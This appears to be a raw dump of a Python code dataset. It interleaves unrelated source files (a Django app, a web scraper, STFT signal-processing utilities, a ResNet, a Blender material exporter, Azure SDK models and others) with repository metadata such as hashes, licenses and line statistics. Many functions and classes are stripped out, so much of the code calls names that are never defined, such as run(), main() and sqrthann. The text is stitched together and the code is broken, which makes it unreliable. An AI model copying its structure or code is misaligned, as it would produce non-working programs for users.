for i in newlist:
print('revenue:'+str(i['AMT'].sum()))
print('newrevenue:'+str(i['new_AMT'].sum()))
newlist[0].to_csv('voyage1.csv')
newlist[1].to_csv('voyage2.csv')
newlist[2].to_csv('voyage3.csv')
| 27.118644 | 121 | 0.62375 |
4c483ae5f1b2a18e4178f810a8a5efb2cf0ef940
| 776 |
py
|
Python
|
tests/test_selection.py
|
qrebjock/fanok
|
5c3b95ca5f2ec90af7060c21409a11130bd350bd
|
[
"MIT"
] | null | null | null |
tests/test_selection.py
|
qrebjock/fanok
|
5c3b95ca5f2ec90af7060c21409a11130bd350bd
|
[
"MIT"
] | null | null | null |
tests/test_selection.py
|
qrebjock/fanok
|
5c3b95ca5f2ec90af7060c21409a11130bd350bd
|
[
"MIT"
] | 1 |
2020-08-26T12:20:26.000Z
|
2020-08-26T12:20:26.000Z
|
import pytest
import numpy as np
from fanok.selection import adaptive_significance_threshold
| 27.714286 | 79 | 0.474227 |
4c49699fa44232922a69a87e2fa00808e22b315a
| 7,256 |
py
|
Python
|
unitcap/unit_cap.py
|
fintelia/habitationi
|
7dd15ecbab0ad63a70505920766de9c27294fb6e
|
[
"Apache-2.0"
] | 1 |
2021-10-03T14:44:38.000Z
|
2021-10-03T14:44:38.000Z
|
unitcap/unit_cap.py
|
fintelia/habitationi
|
7dd15ecbab0ad63a70505920766de9c27294fb6e
|
[
"Apache-2.0"
] | null | null | null |
unitcap/unit_cap.py
|
fintelia/habitationi
|
7dd15ecbab0ad63a70505920766de9c27294fb6e
|
[
"Apache-2.0"
] | 1 |
2021-02-20T23:22:10.000Z
|
2021-02-20T23:22:10.000Z
|
#!/usr/bin/python
# Copyright 2019 Christopher Schmidt
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
from urlparse import urlparse, parse_qs
from jinja2 import Template
import sqlite3
import urllib
PORT_NUMBER = 8080
if __name__ == "__main__":
print run()
| 32.106195 | 108 | 0.553335 |
4c4972e50ba94dc3591b0fc9fac43e37a601a455
| 25 |
py
|
Python
|
matrix/__init__.py
|
AbhiK002/Matrix
|
2d83f08877dccba9e4c710bd5fb65f613848d63f
|
[
"MIT"
] | 2 |
2022-02-11T04:39:21.000Z
|
2022-02-12T15:50:35.000Z
|
matrix/__init__.py
|
AbhiK002/Matrix
|
2d83f08877dccba9e4c710bd5fb65f613848d63f
|
[
"MIT"
] | null | null | null |
matrix/__init__.py
|
AbhiK002/Matrix
|
2d83f08877dccba9e4c710bd5fb65f613848d63f
|
[
"MIT"
] | null | null | null |
from .main import Matrix
| 12.5 | 24 | 0.8 |
4c497bbd6391fbc0eaad2b9548fcee8c07a53d5e
| 2,348 |
py
|
Python
|
samples/cmk/test.py
|
jasstionzyf/Mask_RCNN
|
971a9dd9be1f9716e6f7c23b959bd57079cd93eb
|
[
"MIT"
] | null | null | null |
samples/cmk/test.py
|
jasstionzyf/Mask_RCNN
|
971a9dd9be1f9716e6f7c23b959bd57079cd93eb
|
[
"MIT"
] | null | null | null |
samples/cmk/test.py
|
jasstionzyf/Mask_RCNN
|
971a9dd9be1f9716e6f7c23b959bd57079cd93eb
|
[
"MIT"
] | null | null | null |
import os
import sys
import json
import datetime
import numpy as np
import glob
import skimage
from PIL import Image as pil_image
import cv2
import cv2
dataset_dir='/Volumes/v2/data/mlib_data/dataset/cmk/images_v2/'
subset='val'
load_cmk(dataset_dir=dataset_dir,subset=subset)
locations=[(2,3,5,7),(8,8,9,9)]
height=10
width=10
# mask,classIds=locationToMask(locations=locations,height=height,width=width)
# print(mask)
# print(classIds)
| 18.488189 | 77 | 0.559199 |
4c49c1d6c63daaf7fca0ba56abe4608634b5eea3
| 371 |
py
|
Python
|
myBeautifulSoup.py
|
ZhongXinWang/python
|
4cf3ecdc9d9e811e777c6d8408a8319097cfdec3
|
[
"Apache-2.0"
] | null | null | null |
myBeautifulSoup.py
|
ZhongXinWang/python
|
4cf3ecdc9d9e811e777c6d8408a8319097cfdec3
|
[
"Apache-2.0"
] | null | null | null |
myBeautifulSoup.py
|
ZhongXinWang/python
|
4cf3ecdc9d9e811e777c6d8408a8319097cfdec3
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#Author:Winston.Wang
import requests
from bs4 import BeautifulSoup
print(dir(BeautifulSoup))
url = 'http://www.baidu.com';
with requests.get(url) as r:
r.encoding='utf-8'
soup = BeautifulSoup(r.text)
#
pret = soup.prettify();
u = soup.select('#u1 a')
for i in u:
print("%s,:%s" % (i.getText(),i.get('href')))
| 24.733333 | 52 | 0.660377 |
4c4aaf6acc32d2b6cfe7656b0adf41a02eba514c
| 869 |
py
|
Python
|
blogsNewsModule/urls.py
|
adityakekare/NewsAPIDjango
|
47ff0c69e3d48c10a257c8221916ccd2fdaf9abb
|
[
"MIT"
] | 1 |
2020-10-14T17:13:45.000Z
|
2020-10-14T17:13:45.000Z
|
blogsNewsModule/urls.py
|
adityakekare/NewsAPIDjango
|
47ff0c69e3d48c10a257c8221916ccd2fdaf9abb
|
[
"MIT"
] | null | null | null |
blogsNewsModule/urls.py
|
adityakekare/NewsAPIDjango
|
47ff0c69e3d48c10a257c8221916ccd2fdaf9abb
|
[
"MIT"
] | null | null | null |
from django.urls import path, include
from . import views
urlpatterns = [
path("", views.newsView, name="home"),
path("createBlog", views.CreateBlogView.as_view(), name="createBlog"),
path("myBlogs", views.PostListView.as_view(), name="myBlogs"),
path("single/<int:pk>", views.PostDetailView.as_view(), name="single"),
path("subscribe", views.subscribeView,name="subscribe"),
path("about", views.aboutView, name="about"),
path("edit/<int:pk>", views.UpdateBlogView.as_view(), name="edit"),
path("delete/<int:pk>", views.DeleteBlogView.as_view(), name="delete"),
path("like/<int:pk>", views.LikeView, name="like_post"),
# API urls for superuser
path("api/create/", views.APICreateView.as_view()),
path("api/posts/", views.APIListView.as_view()),
path("api/posts/<int:pk>", views.APIDetailView.as_view()),
]
| 41.380952 | 75 | 0.667434 |
4c4ab4331dee2d296afdfa6d9310db62fe1c4c93
| 3,133 |
py
|
Python
|
unitClass.py
|
MatthewZheng/UnitsPlease
|
5911267b5a0a78dd4d833c6be46e89caaf98c200
|
[
"MIT"
] | null | null | null |
unitClass.py
|
MatthewZheng/UnitsPlease
|
5911267b5a0a78dd4d833c6be46e89caaf98c200
|
[
"MIT"
] | null | null | null |
unitClass.py
|
MatthewZheng/UnitsPlease
|
5911267b5a0a78dd4d833c6be46e89caaf98c200
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
_author_ = "Matthew Zheng"
_purpose_ = "Sets up the unit class"
| 42.917808 | 192 | 0.509416 |
4c4be3eb705a80e6147920908a86da5673e90f59
| 918 |
py
|
Python
|
week4/string_format.py
|
MathAdventurer/Data_Mining
|
b0a06b5f7c13a3762a07eb84518aa4ee56896516
|
[
"MIT"
] | 1 |
2021-02-27T18:35:39.000Z
|
2021-02-27T18:35:39.000Z
|
week4/string_format.py
|
MathAdventurer/Data_Mining
|
b0a06b5f7c13a3762a07eb84518aa4ee56896516
|
[
"MIT"
] | null | null | null |
week4/string_format.py
|
MathAdventurer/Data_Mining
|
b0a06b5f7c13a3762a07eb84518aa4ee56896516
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 26 22:23:07 2020
@author: Neal LONG
Try to construct URL with string.format
"""
base_url = "http://quotes.money.163.com/service/gszl_{:>06}.html?type={}"
stock = "000002"
api_type = 'cp'
print("http://quotes.money.163.com/service/gszl_"+stock+".html?type="+api_type)
print(base_url.format(stock,api_type))
print('='*40)
stock = "00002"
print("http://quotes.money.163.com/service/gszl_"+stock+".html?type="+api_type)
print(base_url.format(stock,api_type))
print('='*40)
print('='*40)
print('{:>6}'.format('236'))
print('{:>06}'.format('236'))
print("Every {} should know the use of {}-{} programming and {}"
.format("programmer", "Open", "Source", "Operating Systems"))
print("Every {3} should know the use of {2}-{1} programming and {0}"
.format("programmer", "Open", "Source", "Operating Systems"))
| 27 | 80 | 0.623094 |
4c4da9a43e106d41a3befb2cd7c5b3dab87492dd
| 274 |
py
|
Python
|
conans/server/server_launcher.py
|
Wonders11/conan
|
28ec09f6cbf1d7e27ec27393fd7bbc74891e74a8
|
[
"MIT"
] | 6,205 |
2015-12-01T13:40:05.000Z
|
2022-03-31T07:30:25.000Z
|
conans/server/server_launcher.py
|
Wonders11/conan
|
28ec09f6cbf1d7e27ec27393fd7bbc74891e74a8
|
[
"MIT"
] | 8,747 |
2015-12-01T16:28:48.000Z
|
2022-03-31T23:34:53.000Z
|
conans/server/server_launcher.py
|
Mattlk13/conan
|
005fc53485557b0a570bb71670f2ca9c66082165
|
[
"MIT"
] | 961 |
2015-12-01T16:56:43.000Z
|
2022-03-31T13:50:52.000Z
|
from conans.server.launcher import ServerLauncher
from conans.util.env_reader import get_env
launcher = ServerLauncher(server_dir=get_env("CONAN_SERVER_HOME"))
app = launcher.server.root_app
if __name__ == "__main__":
main()
| 18.266667 | 66 | 0.762774 |
4c4dd7e5ec767d2a5876ed8c611d8ac4661dfd09
| 153,586 |
py
|
Python
|
sdk/videoanalyzer/azure-mgmt-videoanalyzer/azure/mgmt/videoanalyzer/models/_models.py
|
praveenkuttappan/azure-sdk-for-python
|
4b79413667b7539750a6c7dde15737013a3d4bd5
|
[
"MIT"
] | 2,728 |
2015-01-09T10:19:32.000Z
|
2022-03-31T14:50:33.000Z
|
sdk/videoanalyzer/azure-mgmt-videoanalyzer/azure/mgmt/videoanalyzer/models/_models.py
|
v-xuto/azure-sdk-for-python
|
9c6296d22094c5ede410bc83749e8df8694ccacc
|
[
"MIT"
] | 17,773 |
2015-01-05T15:57:17.000Z
|
2022-03-31T23:50:25.000Z
|
sdk/videoanalyzer/azure-mgmt-videoanalyzer/azure/mgmt/videoanalyzer/models/_models.py
|
v-xuto/azure-sdk-for-python
|
9c6296d22094c5ede410bc83749e8df8694ccacc
|
[
"MIT"
] | 1,916 |
2015-01-19T05:05:41.000Z
|
2022-03-31T19:36:44.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.core.exceptions import HttpResponseError
import msrest.serialization
| 38.473447 | 815 | 0.658563 |
4c4fedd0e6fc912cf1a282846b6e90c655a094c7
| 69,123 |
py
|
Python
|
blender/arm/material/cycles.py
|
philipmduarte/armory
|
675211c66a1e49147226ccb472a6f5dc87b7db02
|
[
"Zlib"
] | 1 |
2021-03-17T05:51:45.000Z
|
2021-03-17T05:51:45.000Z
|
blender/arm/material/cycles.py
|
philipmduarte/armory
|
675211c66a1e49147226ccb472a6f5dc87b7db02
|
[
"Zlib"
] | null | null | null |
blender/arm/material/cycles.py
|
philipmduarte/armory
|
675211c66a1e49147226ccb472a6f5dc87b7db02
|
[
"Zlib"
] | null | null | null |
#
# This module builds upon Cycles nodes work licensed as
# Copyright 2011-2013 Blender Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import math
import bpy
import os
import arm.assets
import arm.utils
import arm.make_state
import arm.log
import arm.material.mat_state as mat_state
import arm.material.cycles_functions as c_functions
import shutil
emission_found = False
particle_info = None # Particle info export
##
##
##
| 39.207601 | 185 | 0.567568 |
4c4ffee559cb6b71ce9c01f453a956254f1cdb8a
| 9,981 |
py
|
Python
|
src/config.py
|
Jizanator/botty
|
3026de0d4c03f4e797ed92dedb8fdfdf9cf1462e
|
[
"MIT"
] | null | null | null |
src/config.py
|
Jizanator/botty
|
3026de0d4c03f4e797ed92dedb8fdfdf9cf1462e
|
[
"MIT"
] | null | null | null |
src/config.py
|
Jizanator/botty
|
3026de0d4c03f4e797ed92dedb8fdfdf9cf1462e
|
[
"MIT"
] | null | null | null |
import configparser
import numpy as np
import os
if __name__ == "__main__":
config = Config(print_warnings=True)
# Check if any added items miss templates
for k in config.items:
if not os.path.exists(f"./assets/items/{k}.png"):
print(f"Template not found: {k}")
# Check if any item templates miss a config
for filename in os.listdir(f'assets/items'):
filename = filename.lower()
if filename.endswith('.png'):
item_name = filename[:-4]
blacklist_item = item_name.startswith("bl__")
if item_name not in config.items and not blacklist_item:
print(f"Config not found for: " + filename)
| 55.45 | 164 | 0.616772 |
4c50b18cade6c81fd3dffac9c31804d4407603cf
| 19,446 |
py
|
Python
|
aps/transform/utils.py
|
haoxiangsnr/aps
|
38f77139b54553b0cb04b26a833bebbbf3177c5e
|
[
"Apache-2.0"
] | 2 |
2021-06-17T20:29:02.000Z
|
2021-09-18T01:56:36.000Z
|
aps/transform/utils.py
|
haoxiangsnr/aps
|
38f77139b54553b0cb04b26a833bebbbf3177c5e
|
[
"Apache-2.0"
] | null | null | null |
aps/transform/utils.py
|
haoxiangsnr/aps
|
38f77139b54553b0cb04b26a833bebbbf3177c5e
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019 Jian Wu
# License: Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
import math
import numpy as np
import torch as th
import torch.nn as nn
import torch.nn.functional as tf
import librosa.filters as filters
from aps.const import EPSILON
from typing import Optional, Union, Tuple
def init_window(wnd: str, frame_len: int) -> th.Tensor:
"""
Return window coefficient
Args:
wnd: window name
frame_len: length of the frame
"""
if wnd not in ["bartlett", "hann", "hamm", "blackman", "rect", "sqrthann"]:
raise RuntimeError(f"Unknown window type: {wnd}")
wnd_tpl = {
"sqrthann": sqrthann,
"hann": th.hann_window,
"hamm": th.hamming_window,
"blackman": th.blackman_window,
"bartlett": th.bartlett_window,
"rect": th.ones
}
if wnd != "rect":
# match with librosa
c = wnd_tpl[wnd](frame_len, periodic=True)
else:
c = wnd_tpl[wnd](frame_len)
return c
def init_kernel(frame_len: int,
frame_hop: int,
window: str,
round_pow_of_two: bool = True,
normalized: bool = False,
inverse: bool = False,
mode: str = "librosa") -> th.Tensor:
"""
Return STFT kernels
Args:
frame_len: length of the frame
frame_hop: hop size between frames
window: window name
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
normalized: return normalized DFT matrix
inverse: return iDFT matrix
mode: framing mode (librosa or kaldi)
"""
if mode not in ["librosa", "kaldi"]:
raise ValueError(f"Unsupported mode: {mode}")
# FFT points
B = 2**math.ceil(math.log2(frame_len)) if round_pow_of_two else frame_len
# center padding window if needed
if mode == "librosa" and B != frame_len:
lpad = (B - frame_len) // 2
window = tf.pad(window, (lpad, B - frame_len - lpad))
if normalized:
# make K^H * K = I
S = B**0.5
else:
S = 1
I = th.stack([th.eye(B), th.zeros(B, B)], dim=-1)
# W x B x 2
K = th.fft(I / S, 1)
if mode == "kaldi":
K = K[:frame_len]
if inverse and not normalized:
# to make K^H * K = I
K = K / B
# 2 x B x W
K = th.transpose(K, 0, 2) * window
# 2B x 1 x W
K = th.reshape(K, (B * 2, 1, K.shape[-1]))
return K, window
def mel_filter(frame_len: int,
round_pow_of_two: bool = True,
num_bins: Optional[int] = None,
sr: int = 16000,
num_mels: int = 80,
fmin: float = 0.0,
fmax: Optional[float] = None,
norm: bool = False) -> th.Tensor:
"""
Return mel filter coefficients
Args:
frame_len: length of the frame
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
num_bins: number of the frequency bins produced by STFT
num_mels: number of the mel bands
fmin: lowest frequency (in Hz)
fmax: highest frequency (in Hz)
norm: normalize the mel filter coefficients
"""
# FFT points
if num_bins is None:
N = 2**math.ceil(
math.log2(frame_len)) if round_pow_of_two else frame_len
else:
N = (num_bins - 1) * 2
# fmin & fmax
freq_upper = sr // 2
if fmax is None:
fmax = freq_upper
else:
fmax = min(fmax + freq_upper if fmax < 0 else fmax, freq_upper)
fmin = max(0, fmin)
# mel filter coefficients
mel = filters.mel(sr,
N,
n_mels=num_mels,
fmax=fmax,
fmin=fmin,
htk=True,
norm="slaney" if norm else None)
# num_mels x (N // 2 + 1)
return th.tensor(mel, dtype=th.float32)
def speed_perturb_filter(src_sr: int,
dst_sr: int,
cutoff_ratio: float = 0.95,
num_zeros: int = 64) -> th.Tensor:
"""
Return speed perturb filters, reference:
https://github.com/danpovey/filtering/blob/master/lilfilter/resampler.py
Args:
src_sr: sample rate of the source signal
dst_sr: sample rate of the target signal
Return:
weight (Tensor): coefficients of the filter
"""
if src_sr == dst_sr:
raise ValueError(
f"src_sr should not be equal to dst_sr: {src_sr}/{dst_sr}")
gcd = math.gcd(src_sr, dst_sr)
src_sr = src_sr // gcd
dst_sr = dst_sr // gcd
if src_sr == 1 or dst_sr == 1:
raise ValueError("do not support integer downsample/upsample")
zeros_per_block = min(src_sr, dst_sr) * cutoff_ratio
padding = 1 + int(num_zeros / zeros_per_block)
# dst_sr x src_sr x K
times = (np.arange(dst_sr)[:, None, None] / float(dst_sr) -
np.arange(src_sr)[None, :, None] / float(src_sr) -
np.arange(2 * padding + 1)[None, None, :] + padding)
window = np.heaviside(1 - np.abs(times / padding),
0.0) * (0.5 + 0.5 * np.cos(times / padding * math.pi))
weight = np.sinc(
times * zeros_per_block) * window * zeros_per_block / float(src_sr)
return th.tensor(weight, dtype=th.float32)
def splice_feature(feats: th.Tensor,
lctx: int = 1,
rctx: int = 1,
subsampling_factor: int = 1,
op: str = "cat") -> th.Tensor:
"""
Splice feature
Args:
feats (Tensor): N x ... x T x F, original feature
lctx: left context
rctx: right context
subsampling_factor: subsampling factor
op: operator on feature context
Return:
splice (Tensor): feature with context padded
"""
if lctx + rctx == 0:
return feats
if op not in ["cat", "stack"]:
raise ValueError(f"Unknown op for feature splicing: {op}")
# [N x ... x T x F, ...]
ctx = []
T = feats.shape[-2]
T = T - T % subsampling_factor
for c in range(-lctx, rctx + 1):
idx = th.arange(c, c + T, device=feats.device, dtype=th.int64)
idx = th.clamp(idx, min=0, max=T - 1)
ctx.append(th.index_select(feats, -2, idx))
if op == "cat":
# N x ... x T x FD
splice = th.cat(ctx, -1)
else:
# N x ... x T x F x D
splice = th.stack(ctx, -1)
return splice
def _forward_stft(
wav: th.Tensor,
kernel: th.Tensor,
output: str = "polar",
pre_emphasis: float = 0,
frame_hop: int = 256,
onesided: bool = False,
center: bool = False) -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]:
"""
STFT inner function
Args:
wav (Tensor), N x (C) x S
kernel (Tensor), STFT transform kernels, from init_kernel(...)
output (str), output format:
polar: return (magnitude, phase) pair
complex: return (real, imag) pair
real: return [real; imag] Tensor
frame_hop: frame hop size in number samples
pre_emphasis: factor of preemphasis
onesided: return half FFT bins
center: if true, we assumed to have centered frames
Return:
transform (Tensor or [Tensor, Tensor]), STFT transform results
"""
wav_dim = wav.dim()
if output not in ["polar", "complex", "real"]:
raise ValueError(f"Unknown output format: {output}")
if wav_dim not in [2, 3]:
raise RuntimeError(f"STFT expect 2D/3D tensor, but got {wav_dim:d}D")
# if N x S, reshape N x 1 x S
# else: reshape NC x 1 x S
N, S = wav.shape[0], wav.shape[-1]
wav = wav.view(-1, 1, S)
# NC x 1 x S+2P
if center:
pad = kernel.shape[-1] // 2
# NOTE: match with librosa
wav = tf.pad(wav, (pad, pad), mode="reflect")
# STFT
if pre_emphasis > 0:
# NC x W x T
frames = tf.unfold(wav[:, None], (1, kernel.shape[-1]),
stride=frame_hop,
padding=0)
frames[:, 1:] = frames[:, 1:] - pre_emphasis * frames[:, :-1]
# 1 x 2B x W, NC x W x T, NC x 2B x T
packed = th.matmul(kernel[:, 0][None, ...], frames)
else:
packed = tf.conv1d(wav, kernel, stride=frame_hop, padding=0)
# NC x 2B x T => N x C x 2B x T
if wav_dim == 3:
packed = packed.view(N, -1, packed.shape[-2], packed.shape[-1])
# N x (C) x B x T
real, imag = th.chunk(packed, 2, dim=-2)
# N x (C) x B/2+1 x T
if onesided:
num_bins = kernel.shape[0] // 4 + 1
real = real[..., :num_bins, :]
imag = imag[..., :num_bins, :]
if output == "complex":
return (real, imag)
elif output == "real":
return th.stack([real, imag], dim=-1)
else:
mag = (real**2 + imag**2 + EPSILON)**0.5
pha = th.atan2(imag, real)
return (mag, pha)
def _inverse_stft(transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]],
kernel: th.Tensor,
window: th.Tensor,
input: str = "polar",
frame_hop: int = 256,
onesided: bool = False,
center: bool = False) -> th.Tensor:
"""
iSTFT inner function
Args:
transform (Tensor or [Tensor, Tensor]), STFT transform results
kernel (Tensor), STFT transform kernels, from init_kernel(...)
input (str), input format:
polar: return (magnitude, phase) pair
complex: return (real, imag) pair
real: return [real; imag] Tensor
frame_hop: frame hop size in number samples
onesided: return half FFT bins
center: used in _forward_stft
Return:
wav (Tensor), N x S
"""
if input not in ["polar", "complex", "real"]:
raise ValueError(f"Unknown output format: {input}")
if input == "real":
real, imag = transform[..., 0], transform[..., 1]
elif input == "polar":
real = transform[0] * th.cos(transform[1])
imag = transform[0] * th.sin(transform[1])
else:
real, imag = transform
# (N) x F x T
imag_dim = imag.dim()
if imag_dim not in [2, 3]:
raise RuntimeError(f"Expect 2D/3D tensor, but got {imag_dim}D")
# if F x T, reshape 1 x F x T
if imag_dim == 2:
real = th.unsqueeze(real, 0)
imag = th.unsqueeze(imag, 0)
if onesided:
# [self.num_bins - 2, ..., 1]
reverse = range(kernel.shape[0] // 4 - 1, 0, -1)
# extend matrix: N x B x T
real = th.cat([real, real[:, reverse]], 1)
imag = th.cat([imag, -imag[:, reverse]], 1)
# pack: N x 2B x T
packed = th.cat([real, imag], dim=1)
# N x 1 x T
s = tf.conv_transpose1d(packed, kernel, stride=frame_hop, padding=0)
# normalized audio samples
# refer: https://github.com/pytorch/audio/blob/2ebbbf511fb1e6c47b59fd32ad7e66023fa0dff1/torchaudio/functional.py#L171
# 1 x W x T
win = th.repeat_interleave(window[None, ..., None],
packed.shape[-1],
dim=-1)
# W x 1 x W
I = th.eye(window.shape[0], device=win.device)[:, None]
# 1 x 1 x T
norm = tf.conv_transpose1d(win**2, I, stride=frame_hop, padding=0)
if center:
pad = kernel.shape[-1] // 2
s = s[..., pad:-pad]
norm = norm[..., pad:-pad]
s = s / (norm + EPSILON)
# N x S
s = s.squeeze(1)
return s
def forward_stft(
wav: th.Tensor,
frame_len: int,
frame_hop: int,
output: str = "complex",
window: str = "sqrthann",
round_pow_of_two: bool = True,
pre_emphasis: float = 0,
normalized: bool = False,
onesided: bool = True,
center: bool = False,
mode: str = "librosa") -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]:
"""
STFT function implementation, equals to STFT layer
Args:
wav: source audio signal
frame_len: length of the frame
frame_hop: hop size between frames
output: output type (complex, real, polar)
window: window name
center: center flag (similar with that in librosa.stft)
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
pre_emphasis: factor of preemphasis
normalized: use normalized DFT kernel
onesided: output onesided STFT
inverse: using iDFT kernel (for iSTFT)
mode: "kaldi"|"librosa", slight difference on applying window function
"""
K, _ = init_kernel(frame_len,
frame_hop,
init_window(window, frame_len),
round_pow_of_two=round_pow_of_two,
normalized=normalized,
inverse=False,
mode=mode)
return _forward_stft(wav,
K.to(wav.device),
output=output,
frame_hop=frame_hop,
pre_emphasis=pre_emphasis,
onesided=onesided,
center=center)
def inverse_stft(transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]],
frame_len: int,
frame_hop: int,
input: str = "complex",
window: str = "sqrthann",
round_pow_of_two: bool = True,
normalized: bool = False,
onesided: bool = True,
center: bool = False,
mode: str = "librosa") -> th.Tensor:
"""
iSTFT function implementation, equals to iSTFT layer
Args:
transform: results of STFT
frame_len: length of the frame
frame_hop: hop size between frames
input: input format (complex, real, polar)
window: window name
center: center flag (similar with that in librosa.stft)
round_pow_of_two: if true, choose round(#power_of_two) as the FFT size
normalized: use normalized DFT kernel
onesided: output onesided STFT
mode: "kaldi"|"librosa", slight difference on applying window function
"""
if isinstance(transform, th.Tensor):
device = transform.device
else:
device = transform[0].device
K, w = init_kernel(frame_len,
frame_hop,
init_window(window, frame_len),
round_pow_of_two=round_pow_of_two,
normalized=normalized,
inverse=True,
mode=mode)
return _inverse_stft(transform,
K.to(device),
w.to(device),
input=input,
frame_hop=frame_hop,
onesided=onesided,
center=center)
| 34.849462 | 121 | 0.538671 |
4c517119112a50b7dbf0616dc32615e3180ecafa
| 3,427 |
py
|
Python
|
applications/tensorflow/cnns/models/resnet.py
|
xihuaiwen/chinese_bert
|
631afbc76c40b0ac033be2186e717885246f446c
|
[
"MIT"
] | null | null | null |
applications/tensorflow/cnns/models/resnet.py
|
xihuaiwen/chinese_bert
|
631afbc76c40b0ac033be2186e717885246f446c
|
[
"MIT"
] | null | null | null |
applications/tensorflow/cnns/models/resnet.py
|
xihuaiwen/chinese_bert
|
631afbc76c40b0ac033be2186e717885246f446c
|
[
"MIT"
] | null | null | null |
# Copyright 2019 Graphcore Ltd.
from models.resnet_base import ResNet
import tensorflow.compat.v1 as tf
import tensorflow.contrib as contrib
from tensorflow.python.ipu import normalization_ops
# This is all written for: NHWC
| 38.505618 | 101 | 0.569594 |
4c545b9b4e257d67ea1869f9e75cf7e1b7bca4c8
| 613 |
py
|
Python
|
backend/app/migrations/0021_auto_20201205_1846.py
|
mareknowak98/AuctionPortal
|
0059fec07d51c6942b8af73cb8c4f9962c21fc97
|
[
"MIT"
] | null | null | null |
backend/app/migrations/0021_auto_20201205_1846.py
|
mareknowak98/AuctionPortal
|
0059fec07d51c6942b8af73cb8c4f9962c21fc97
|
[
"MIT"
] | null | null | null |
backend/app/migrations/0021_auto_20201205_1846.py
|
mareknowak98/AuctionPortal
|
0059fec07d51c6942b8af73cb8c4f9962c21fc97
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.1.4 on 2020-12-05 18:46
from django.db import migrations, models
| 25.541667 | 73 | 0.60522 |
4c551d5c25c26d348d1738fdb22529ee094e17ed
| 8,942 |
py
|
Python
|
rawcdf_extract.py
|
bedaro/ssm-analysis
|
09880dbfa5733d6301b84accc8f42a5ee320d698
|
[
"MIT"
] | null | null | null |
rawcdf_extract.py
|
bedaro/ssm-analysis
|
09880dbfa5733d6301b84accc8f42a5ee320d698
|
[
"MIT"
] | null | null | null |
rawcdf_extract.py
|
bedaro/ssm-analysis
|
09880dbfa5733d6301b84accc8f42a5ee320d698
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import time
import os
import tempfile
import shutil
import logging
from enum import Enum
from argparse import ArgumentParser, Namespace, FileType
from netCDF4 import Dataset, MFDataset
import geopandas as gpd
import numpy as np
domain_nodes_shp = "gis/ssm domain nodes.shp"
masked_nodes_txt = "gis/masked nodes.txt"
logger = logging.getLogger(__name__)
DEFAULT_SIGLAYERS = [-0.01581139, -0.06053274, -0.12687974, -0.20864949,
-0.30326778, -0.40915567, -0.52520996, -0.65060186,
-0.78467834, -0.9269075 ]
# Gotten from https://stackoverflow.com/questions/312443/how-do-you-split-a-list-or-iterable-into-evenly-sized-chunks
attr_strings = {
"all": InputAttr.ALL,
"bottom": InputAttr.BOTTOM
}
# Expands an input variable argument into a variable name and an attribute
# describing the vertical extraction method.
if __name__ == "__main__": main()
| 40.461538 | 117 | 0.64225 |
4c55251ed58f769e9fbe55114b14a016770952cb
| 1,075 |
py
|
Python
|
libcity/executor/map_matching_executor.py
|
nadiaaaaachen/Bigscity-LibCity
|
d8efd38fcc238e3ba518c559cc9f65b49efaaf71
|
[
"Apache-2.0"
] | 1 |
2021-11-22T12:22:32.000Z
|
2021-11-22T12:22:32.000Z
|
libcity/executor/map_matching_executor.py
|
yuanhaitao/Bigscity-LibCity
|
9670c6a2f26043bb8d9cc1715780bb599cce2cd5
|
[
"Apache-2.0"
] | null | null | null |
libcity/executor/map_matching_executor.py
|
yuanhaitao/Bigscity-LibCity
|
9670c6a2f26043bb8d9cc1715780bb599cce2cd5
|
[
"Apache-2.0"
] | null | null | null |
from logging import getLogger
from libcity.executor.abstract_tradition_executor import AbstractTraditionExecutor
from libcity.utils import get_evaluator
| 29.861111 | 94 | 0.652093 |
4c55a30419a518ea1054e9871ae5c2c7cf5db9f5
| 307 |
py
|
Python
|
project1/budget/migrations/0005_delete_hiddenstatus_budget.py
|
sujeethiremath/Project-1
|
7f0bff66287d479e231e123615f2df18f9107178
|
[
"MIT"
] | null | null | null |
project1/budget/migrations/0005_delete_hiddenstatus_budget.py
|
sujeethiremath/Project-1
|
7f0bff66287d479e231e123615f2df18f9107178
|
[
"MIT"
] | null | null | null |
project1/budget/migrations/0005_delete_hiddenstatus_budget.py
|
sujeethiremath/Project-1
|
7f0bff66287d479e231e123615f2df18f9107178
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.2.5 on 2020-04-08 00:08
from django.db import migrations
| 18.058824 | 47 | 0.618893 |
4c55bbb06ea35dd59d573da6a8f782da8c81fbf2
| 3,548 |
py
|
Python
|
tutorial/43.py
|
mssung94/daishin-trading-system
|
d6682495afb7a08e68db65537b1d1789f2996891
|
[
"MIT"
] | 2 |
2020-11-21T08:45:26.000Z
|
